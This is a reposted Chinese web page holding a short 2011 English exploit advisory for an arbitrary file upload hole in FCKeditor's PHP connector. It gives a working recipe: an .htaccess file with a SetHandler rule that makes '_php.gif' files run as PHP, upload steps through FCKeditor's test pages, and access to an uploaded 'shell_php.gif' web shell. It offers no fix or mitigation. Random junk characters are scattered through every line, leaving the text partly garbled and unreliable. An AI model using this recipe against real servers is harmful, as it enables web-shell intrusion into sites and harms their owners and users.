FCKeditor所有php版本Upload上传漏洞0 @) p0 {/ r% `# f/ j
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07) z8 z/ G- U+ S4 E; D9 O
减小字体 增大字体7 m! T1 ~$ T w! a; b# c) s3 T% [
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 N4 o& g w& w. `; t
[+] Date: 20118 ^. T% R$ d3 @3 r/ M
[+] Author : sinesafe.cn
+ h9 t3 h( `* W2 c[+] Website : WwW.sinesafe.cn
1 Y8 O% ]; z% g6 r# m———————————————————
2 T5 g0 x6 W% m% v9 {/ q' o1.create a htaccess file:& S% m/ o! q( h% |/ G3 u
code:
4 M3 l; z$ `: f% @0 q<FilesMatch “_php.gif”>
2 T$ I5 e1 ]& @2 {$ N oSetHandler application/x-httpd-php
' O4 ^" m: T: f4 o8 u1 b% {</FilesMatch>% _* W% D& c3 Z5 B( S
& o; [: s! [5 z8 j M
2.Now upload this htaccess with FCKeditor.
' J7 |1 H, N( O; ~ }
^+ B2 V8 ], E: N- s+ thttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html' }/ Q8 o) T* R9 h3 ?
1 V( B$ [; [% [ [& Z
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
0 U# J& d6 d4 g$ h p
1 ?5 @$ ^/ Q- q———————————————————————————————-
2 c9 U) e @/ p& V V3.Now upload shell.php.gif with FCKeditor.
8 |( d$ ^7 L8 _ d% A& y4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 B+ v' R6 a0 ~* j& X; g* f
5.http://www.sinesafe.cn/anything/shell_php.gif
( F; T4 b* Q$ `( \ v6.Now shell is available from server. | 4 y4 d$ J/ I" |, J+ S. d) u
6 ?1 @0 r5 a# F1 [, n
4 D) j8 Z. E4 ]' b |